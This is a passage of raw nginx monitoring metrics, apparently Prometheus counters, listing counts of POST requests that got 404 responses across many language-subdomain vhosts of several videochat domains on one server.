nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.world"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.tv.br"} 261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.world"} 241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.date"} 214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.tv.br"} 335 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.world"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.world"} 314 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.world"} 202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.mx"} 293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.tv.br"} 211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.world"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.date"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.mx"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.show"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.tv.br"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.world"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="forum.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.world"} 161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.tv.br"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.world"} 86 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.tv.br"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.world"} 224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.cafe"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.world"} 238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.cafe"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.date"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.world"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="help.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.date"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.world"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.date"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.show"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.world"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.cafe"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.mx"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.tv.br"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.cafe"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.date"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.world"} 362 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.world"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.world"} 492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.date"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.world"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jaiyuba.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.date"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.tv.br"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.world"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.tv.br"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.world"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.cafe"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.world"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kbmjvka.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kctjjudm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kjjlaro.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.cafe"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.world"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.tv.br"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.world"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.tv.br"} 343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.world"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.date"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.mx"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.tv.br"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.world"} 228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.show"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.world"} 100 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.mx"} 260 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.world"} 234 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.world"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="login.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.date"} 252 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.world"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.date"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.tv.br"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.world"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mail.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="media.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.cafe"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.tv.br"} 266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.world"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.date"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.tv.br"} 260 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.date"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.world"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.mx"} 255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.tv.br"} 513 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.world"} 182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.date"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.cafe"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.tv.br"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.world"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.world"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.world"} 155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.mx"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.world"} 212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.mx"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.tv.br"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.world"} 302 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="news.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.tv.br"} 299 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.world"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.date"} 386 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.mx"} 213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.tv.br"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.world"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="old.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.mx"} 61 